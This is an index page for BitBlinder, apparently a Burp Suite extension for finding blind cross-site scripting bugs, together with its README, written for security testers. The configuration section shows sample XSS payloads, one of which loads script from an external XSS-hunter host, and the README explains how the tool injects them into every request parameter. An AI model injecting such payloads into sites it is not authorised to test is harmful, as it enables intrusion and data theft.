Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/BitTheByte/BitBlinder
BurpSuite extension to inject custom cross-site scripting payloads on every form/request submitted to detect blind XSS vulnerabilities
https://github.com/BitTheByte/BitBlinder
burp-extensions burp-plugin burpsuite burpsuite-extender jython python
Last synced: about 1 month ago
JSON representation
BurpSuite extension to inject custom cross-site scripting payloads on every form/request submitted to detect blind XSS vulnerabilities
- Host: GitHub
- URL: https://github.com/BitTheByte/BitBlinder
- Owner: BitTheByte
- Created: 2019-01-28T20:45:39.000Z (almost 6 years ago)
- Default Branch: master
- Last Pushed: 2023-06-04T18:55:35.000Z (over 1 year ago)
- Last Synced: 2024-08-01T10:17:15.898Z (4 months ago)
- Topics: burp-extensions, burp-plugin, burpsuite, burpsuite-extender, jython, python
- Language: Python
- Homepage:
- Size: 12.7 KB
- Stars: 107
- Watchers: 5
- Forks: 23
- Open Issues: 3
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-bugbounty-tools - BitBlinder - BurpSuite extension to inject custom cross-site scripting payloads on every form/request submitted to detect blind XSS vulnerabilities (Exploitation / XSS Injection)
- awesome-burp-extensions - BitBlinder - Burp extension helps in finding blind xss vulnerabilities (Vulnerability Specific Extensions / Cross-site scripting)
- awesome-hacking-lists - BitTheByte/BitBlinder - BurpSuite extension to inject custom cross-site scripting payloads on every form/request submitted to detect blind XSS vulnerabilities (Python)
README
# BitBlinder
**THIS TOOLS IS IN EARLY BETA USE IT ON YOUR OWN RISK**
Burp extension helps in finding blind xss vulnerabilities by injecting xss payloads in every request passes throw BurpSuite
```
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
- Developer: Ahmed Ezzat (BitTheByte) -
- Github: https://github.com/BitTheByte -
- Version: 0.05b -
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
[WARNING] MAKE SURE TO EDIT THE SETTINGS BEFORE USE
[WARNING] THIS TOOL WILL WORK FOR IN-SCOPE ITEMS ONLY
[WARNING] THIS TOOL WILL CONSUME TOO MUCH BANDWIDTH
```# Configuration
Go to `Bit blinder` tab then enable it
Set your payloads (line separated)
```
"><script>
"><script%20src="https://myusername.xss.ht"><script>
...
```
If you added more than 1 payload enable the randomization button
If you want to keep it disabled keep in mind that the tool will use the first payload only# How to use
1. Load the extension to your burpsuite
2. Click on `Bit blinder` tab then enable it
3. Add your target to scope **It'll only work for inscope items**
4. Continue your hunting session **Make sure to do alot of actions [Forms,Search,...]**
5. Monitor the output in extension's output tab**Note:** By the nature of this tool it'll make alot of requests so you may get blocked by WAF or experience slow internet connection
# In a nutshell
When user visits [https://example.com?vuln=123&vuln2=abc](https://example.com?vuln=123&vuln2=abc)
This tool will generate the following 2 requests (in the background without effecting the current session)
1. [https://example.com?vuln=[YOUR_XSS_PAYLOAD]&vuln2=abc](https://example.com?vuln=[YOUR_XSS_PAYLOAD]&vuln2=abc)
2. [https://example.com?vuln=123&vuln2=[YOUR_XSS_PAYLOAD]](https://example.com?vuln=123&vuln2=[YOUR_XSS_PAYLOAD])The previous example also applies to `POST` parameters
# Current version
```
Version 0.05b
```# TO-DO (By priority)
- GUI ✓ ( A very ugly one for now.. )
- Fix endless request loops ✓
- Injection in headers
- Option to exclude paramters/hosts/endpoints
- Better output/logging system